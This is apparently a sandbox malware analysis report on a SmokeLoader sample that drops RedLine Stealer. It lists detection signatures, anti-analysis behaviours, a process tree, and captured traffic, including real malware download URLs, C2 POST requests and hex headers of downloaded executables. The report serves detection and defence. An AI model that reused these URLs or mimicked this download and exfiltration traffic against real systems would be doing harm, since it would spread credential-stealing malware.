Loading ...

Play interactive tourEdit tour

Windows Analysis Report X5lLjSzDd8.exe

Overview

General Information

Sample Name:X5lLjSzDd8.exe
Analysis ID:524289
MD5:743f8fec87ebf7c5d6b392261ec3988f
SHA1:1bc862eecde55f2c1de69bc9e3fdd7468de373d0
SHA256:c9f18cc71c7a1fa61d43a32dfb858f9aa247324a188f8182981b853266d3b1c7
Tags:DofoilexeSmokeLoader
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
PE file contains section with special chars
Hides threads from debuggers
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Social media urls found in memory data
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • X5lLjSzDd8.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\X5lLjSzDd8.exe" MD5: 743F8FEC87EBF7C5D6B392261EC3988F)
    • X5lLjSzDd8.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\X5lLjSzDd8.exe" MD5: 743F8FEC87EBF7C5D6B392261EC3988F)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • BEE7.exe (PID: 6768 cmdline: C:\Users\user~1\AppData\Local\Temp\BEE7.exe MD5: 8EF1AE58E545946BACA2DBC17E135577)
          • BEE7.exe (PID: 1344 cmdline: C:\Users\user~1\AppData\Local\Temp\BEE7.exe MD5: 8EF1AE58E545946BACA2DBC17E135577)
        • DA6F.exe (PID: 6580 cmdline: C:\Users\user~1\AppData\Local\Temp\DA6F.exe MD5: D6F23ADF6D5B20A214640C56E570AB2E)
        • E8E7.exe (PID: 6908 cmdline: C:\Users\user~1\AppData\Local\Temp\E8E7.exe MD5: 5E34695C9F46F1E69CE731D3B7359C88)
          • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • E8E7.exe (PID: 3596 cmdline: C:\Users\user~1\AppData\Local\Temp\E8E7.exe MD5: 5E34695C9F46F1E69CE731D3B7359C88)
          • E8E7.exe (PID: 5480 cmdline: C:\Users\user~1\AppData\Local\Temp\E8E7.exe MD5: 5E34695C9F46F1E69CE731D3B7359C88)
        • FB48.exe (PID: 1804 cmdline: C:\Users\user~1\AppData\Local\Temp\FB48.exe MD5: 0198C5A612317A06F11ABBE95294408E)
        • 2D0D.exe (PID: 4352 cmdline: C:\Users\user~1\AppData\Local\Temp\2D0D.exe MD5: A77F1ED5881D44FC95BF3DA05C349385)
  • rfudbri (PID: 5824 cmdline: C:\Users\user\AppData\Roaming\rfudbri MD5: 743F8FEC87EBF7C5D6B392261EC3988F)
    • rfudbri (PID: 2016 cmdline: C:\Users\user\AppData\Roaming\rfudbri MD5: 743F8FEC87EBF7C5D6B392261EC3988F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.341140573.0000000002091000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000012.00000002.416663548.0000000002410000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
        • 0x2fec8:$: VFZxUUFBT
        • 0x8c8d8:$: VFZxUUFBT
        00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000003.00000002.341021768.0000000000540000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            28.0.E8E7.exe.400000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              28.0.E8E7.exe.400000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                28.0.E8E7.exe.400000.10.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  28.0.E8E7.exe.400000.8.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    19.2.E8E7.exe.3ce5de0.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 6 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://host-file-host0.com/files/9370_1636985686_7616.exeAvira URL Cloud: Label: malware
                      Source: http://45.87.154.2/vN1zS0qN2nD1iF6p/04805958955520964044.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeAvira: detection malicious, Label: HEUR/AGEN.1137140
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeAvira: detection malicious, Label: HEUR/AGEN.1144480
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: X5lLjSzDd8.exeVirustotal: Detection: 45%Perma Link
                      Source: X5lLjSzDd8.exeReversingLabs: Detection: 51%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://host-file-host0.com/files/9370_1636985686_7616.exeVirustotal: Detection: 12%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeMetadefender: Detection: 22%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeReversingLabs: Detection: 53%
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeReversingLabs: Detection: 70%
                      Source: C:\Users\user\AppData\Roaming\rfudbriReversingLabs: Detection: 51%
                      Machine Learning detection for sampleShow sources
                      Source: X5lLjSzDd8.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\rfudbriJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeJoe Sandbox ML: detected
                      Source: 3.0.X5lLjSzDd8.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 3.0.X5lLjSzDd8.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 3.0.X5lLjSzDd8.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 3.0.X5lLjSzDd8.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49804 version: TLS 1.0
                      Source: X5lLjSzDd8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49802 version: TLS 1.2
                      Source: Binary string: \C:\risoferacev\79_bositi\vuka\rakusayafona_k.pdb source: X5lLjSzDd8.exe, 00000000.00000000.249790357.0000000000401000.00000020.00020000.sdmp, X5lLjSzDd8.exe, 00000003.00000000.265422304.0000000000401000.00000020.00020000.sdmp, rfudbri, 0000000F.00000000.373421970.0000000000401000.00000020.00020000.sdmp, rfudbri, 00000014.00000000.400193517.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\xeyox pacoramebe.pdb source: BEE7.exe, 00000010.00000000.376294361.0000000000401000.00000020.00020000.sdmp, BEE7.exe, 00000012.00000000.396723249.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: DA6F.exe, 00000011.00000002.525448053.0000000000D68000.00000040.00020000.sdmp, 2D0D.exe, 0000001B.00000002.526418179.0000000001280000.00000040.00020000.sdmp
                      Source: Binary string: TC:\xeyox pacoramebe.pdbP source: BEE7.exe, 00000010.00000000.376294361.0000000000401000.00000020.00020000.sdmp, BEE7.exe, 00000012.00000000.396723249.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\risoferacev\79_bositi\vuka\rakusayafona_k.pdb source: X5lLjSzDd8.exe, 00000000.00000000.249790357.0000000000401000.00000020.00020000.sdmp, X5lLjSzDd8.exe, 00000003.00000000.265422304.0000000000401000.00000020.00020000.sdmp, rfudbri, 0000000F.00000000.373421970.0000000000401000.00000020.00020000.sdmp, rfudbri, 00000014.00000000.400193517.0000000000401000.00000020.00020000.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.7:49870 -> 8.209.71.17:80
                      Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.7:49871 -> 8.209.71.17:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: host-file-host0.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 45.87.154.2 80
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 187
                      Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.top
                      Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                      May check the online IP address of the machineShow sources
                      Source: unknownDNS query: name: iplogger.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /attachments/907388240229716010/909788097527545866/45756734124235.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 18 Nov 2021 09:30:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Thu, 18 Nov 2021 09:30:03 GMTETag: "45a00-5d10ccd9fb55d"Accept-Ranges: bytesContent-Length: 285184Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 b4 92 27 74 d5 fc 74 74 d5 fc 74 74 d5 fc 74 1b a3 57 74 5d d5 fc 74 1b a3 62 74 65 d5 fc 74 1b a3 56 74 17 d5 fc 74 7d ad 6f 74 7f d5 fc 74 74 d5 fd 74 fe d5 fc 74 1b a3 53 74 75 d5 fc 74 1b a3 66 74 75 d5 fc 74 1b a3 61 74 75 d5 fc 74 52 69 63 68 74 d5 fc 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9b 46 0a 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 f2 02 00 00 90 b9 01 00 00 00 00 d0 79 01 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 bc 01 00 04 00 00 f1 9b 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 f4 02 00 78 00 00 00 00 60 bb 01 c0 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 bb 01 94 16 00 00 60 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 77 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a f0 02 00 00 10 00 00 00 f2 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 4a b8 01 00 10 03 00 00 14 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 44 00 00 00 60 bb 01 00 46 00 00 00 0a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 08 01 00 00 b0 bb 01 00 0a 01 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 18 Nov 2021 09:30:16 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Wed, 17 Nov 2021 09:10:54 GMTETag: "2c2600-5d0f86b581091"Accept-Ranges: bytesContent-Length: 2893312Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 dd 7e da 80 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ec 02 00 00 1c 05 00 00 00 00 00 a0 49 4d 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 72 00 00 04 00 00 ba 9f 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a 60 08 00 50 00 00 00 00 20 03 00 44 18 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 00 00 03 00 00 20 00 00 00 6a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 44 18 05 00 00 20 03 00 00 1a 05 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 0c 00 00 00 00 40 08 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 20 00 00 00 60 08 00 00 02 00 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 68 65 6d 69 64 61 00 c0 44 00 00 80 08 00 00 00 00 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 9a 25 00 00 40 4d 00 00 9a 25 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 18 Nov 2021 09:30:26 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Mon, 15 Nov 2021 14:14:46 GMTETag: "2e400-5d0d46e5c997c"Accept-Ranges: bytesContent-Length: 189440Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0d 6d 92 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 fe 01 00 00 e2 00 00 00 00 00 00 0a 20 03 00 00 00 01 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0c 01 00 57 00 00 00 00 00 03 00 7e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 48 00 00 00 00 00 00 00 00 00 00 00 49 21 26 17 0d 08 25 2b 48 d4 00 00 00 20 00 00 00 d6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 d8 fb 01 00 00 00 01 00 00 fc 01 00 00 da 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7e 08 00 00 00 00 03 00 00 0a 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 20 03 00 00 02 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 03 00 00 02 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49804 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /attachments/825918003454935051/909883200657031198/Faints.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/903028136416002089/910600430113931304/123f.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovnfahllse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ndqivnd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lcapgjmve.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kbmxn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: GET /setup.exe%09 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 216.128.137.31
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aykdwcs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjbqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhwgwmij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhaduhxh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: GET /files/9196_1637140254_4196.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host0.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xybblvjvyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdbtf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-file-host6.com
